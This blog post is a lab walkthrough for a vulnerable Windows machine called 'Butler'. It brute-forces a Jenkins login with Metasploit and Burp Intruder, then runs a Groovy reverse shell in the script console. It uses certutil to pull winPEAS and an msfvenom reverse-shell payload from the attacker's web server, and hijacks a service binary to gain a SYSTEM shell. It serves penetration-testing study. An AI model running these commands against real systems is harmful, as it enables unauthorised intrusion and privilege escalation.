BUTLER MACHINE EXPLOIT WALKTHROUGH
Babs
Posted on July 13, 2024
This walkthrough will showcase a creative approach in exploiting a windows machine named butler and gaining access on the machine.
After successfully setting up your butler windows machine, use the following details to login to the machine.
butler: JeNkIn5@44
administrator: A%rc!BcA!
We can login using the administrator password A%rc!BcA! so as to get the IP address of our butler windows machine.
After successful login to our windows machine, we open the command prompt and input the command below to get our IP address:
ipconfig
From the image above, my IP address is "192.168.182.142"
We can start by pinging our windows machine from our kali using the command:
ping 192.168.182.142 -c3
to make sure both machines are communicating
The next step now is to run an Nmap scan using the command:
nmap -p- -A 192.168.182.142
From the above image we can see that port 8080 is open which is using http service, so the next step is to visit the website on our browser using:
192.168.182.142:8080
We landed on a jenkins login page.
After much enumerations I couldn't find anything, so I searched the web for jenkins default password.
So I tried using the default password and it still failed.
So the next thing left for me now is to try a brute force attack and for that I want to use metasploit.
So we open a new tab on our kali and input the command below to turn on metasploit:
msfconsole
So next, we search the word jenkins using the command:
search jenkins
For me on number 19, it's showing me a jenkins login with the details "19 auxiliary/scanner/http/jenkins_login"
NB- your own jenkins login number might be different, so make sure to use the jenkins login number of yours.
So next, I input the command:
use 19
Then I input the command:
options
My idea is to use rockyou.txt wordlist for both the username and password but it will take hours if not days for the brute force attack to be complete.
So for the options set the following parameters by inputting the command:
set username jenkins
set pass_file /usr/share/wordlists/rockyou.txt
set user_as_pass true
set stop_on_success true
set rhosts 192.168.182.142
NB- So basically, what I am trying to do is use the username jenkins as a trial and see if it will have a successful login using the password file of rockyou.txt.
In a case where there's no username to try we can use rockyou.txt for the username file but like I said the attack would take hours if not days to be successful, so to make you get the password on time, make sure to set the username as jenkins.
Now input the command:
options
to make sure all what was set has been properly set and is reflecting.
Now input the command below to run the exploit:
run
After successfully running the exploit, we can see from the output that the username and password for the jenkins website is jenkins:jenkins
So both the username and password are the same.
- I'd also like to show you how to use burp-suite for a brute-force attack.
HOW TO USE BURP-SUITE FOR BRUTE FORCE ATTACK
-Search for foxyproxy extension on your firefox browser on kali and then add it to your extension
- Click on the extension, right click and select the manage extension option
- Click on proxies and then add
- Now set the title, type, hostname and port as seen in the image below and then save
Now once you have visited the jenkins login page, make sure your foxyproxy extension is switched on.
- Now search for burpsuite on your kali and open it
- Press next
- Start burp
- Click on proxy and set intercept to on
- Remember to make sure that foxyproxy extension is on
-Now input a wrong username and password for the jenkin login
It will take you straight to burp and show you a page as seen below
- right click and then send to repeater and also send to intruder
- From repeater you can easily change the username and password and then click on send to know if the details are corrected but doing this with repeater will take time.
- So now we switch to intruder
- Next we double click on the username hacker and the click on add
- Then we double click on the password hacker and the click on add
It has shown us from the image that we have highlighted two position/options that we would like to change
- Next we switch out attack type to cluster bomb because we want to try all the usernames with all the passwords
- Now click on payload
what we are trying to do is to guess some usernames and passwords that we would like to use for a brute force attack
- So we input them as seen in the image below and click on add and keep adding as much as we want to.
- Then we switch to 2 as seen in the image below and input the passwords we would like to try.
- Click on start attack
- Notice how from the response we got the status code is the same but what we are mainly focusing on is the length and from the image below we can see a big difference in the length for jenkins-jenkins, because the length difference gives us an indication that there's something different, so we try the username and password on the jenkins page.
NB- make sure to turn off your burp-suite and foxyproxy
Now we go back to our jenkins login page and input the username and password jenkins
we have successfully logged in.
Now we are trying to find a place to run code execution .
For that click on manage jenkins
And then click on script console
The script console seems to be in groovy
Search google for groovy reverse shell and select the one from github as seen in the image below
Now click on raw and copy all
Now paste it script console
Since the reverse shell script wants to use port 8044 so we set up a listener using the command:
nc -nvlp 8044
Now we need to change the local host to our attacking machine's IP address
Now click on the run
We have successfully popped a shell
Input the command below to find out who we are on the system
whoami
From the image above, we can see that we are butler and we are not system admin, so we would need to do some privilege escalation.
For this we would use a tool called winpeas
It is a privilege escalation tool for windows.
Search google for winpeas
select the one as seen in the image above
Then select the winpeasexe file
Scroll down and click on download the latest
Click on winpeasX64
Once you have successfully downloaded it, it should be in your downloads directory.
Now that it has been successfully downloaded, we need to host up a web server and then get the file from our shell we popped
To do that , input the command below in your downloads directory:
python3 -m http.server 80
Then on our tab which we popped a shell, we need to go into a directory we know that we have read and write permission.
So input the command:
cd c:\users
Input the command;
dir
Now input the command:
cd butler
Now we would put winpeas here because it is butler's base directory and we should have a higher permission for this directory.
So to put the file here, input the command;
certutil.exe -urlcache -f http://192.168.182.129/winPEASx64.exe winpeas.exe
The file should have successfully downloaded and be named as winpeas.exe on the windows system
Input the command below to find the file:
dir
Now we need to run winpeas and to do that we input the command:
winpeas.exe
For this particular exploit, we are interested in finding out which services are running on the system, so scroll down to service information found from winpeas
The image above shows some of the services running on the butler windows machine.
Out of all the services running, the wiseboot is the one we are interested in.
The next step now is to generate some malware, we can use metasploit to do that but for this exploit we would be doing it manually using the command:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.182.129 LPORT=7777 -f exe > wise.exe
NB- Make sure to change the LHOST to your kali's IP address.
Once the malware has been generated we need to host up a web server and receive it on our windows tab in which we popped the shell
The image above shows that I generated the malware on my Downloads directory, so I would host up the web server there using the command:
python3 -m http.server 80
NB- Make sure you have cancelled the web server we were previously hosting.
Use Crtl C to cancel the previous one if you haven't
And if yours is still being hosted from the first time we hosted it and you do not wish to cancel, then do not cancel, just do not re-host it and then just input the command to receive the wise.exe file on the windows machine.
Next we need to open up a new tab and then listen on port 7777 because that is the port we plan on using for the exploit and for that we use the command:
nc -nvlp 7777
Now we need to cd into the wise directory, so for that input the command:
cd c:\
dir
Then we need to go into the program file x86 directory, so input the command:
cd Program Files (x86)
Now cd into wise using the command:
cd Wise
Now we want to put the wise.exe file here, so we input the command:
certutil -urlcache -f http://192.168.182.129/wise.exe wise.exe
Once it has been successful, input the command:
dir
to confirm
We need to first stop the service that's running as wisebootassistant, because if we don't, we might pop a shell back as butler instead of system admin, so to stop the service, input the command:
sc stop wisebootassistant
To confirm that the service has stopped, input the command:
sc query wisebootassistant
Now we need to start it using the command:
sc start wisebootassistant
We have successfully popped a shell as system.
Input the command below to confirm:
whoami
and input the command below to get the system info:
systeminfo
MAJOR PROBLEM YOU MIGHT FACE WHILE EXPLOITING THIS MACHINE
For some reasons the machine would keep shutting down so whenever it shuts down, make sure to turn it back on.
GOODLUCK!!!
Posted on July 13, 2024
Join Our Newsletter. No Spam, Only the good stuff.
Sign up to receive the latest update from our blog.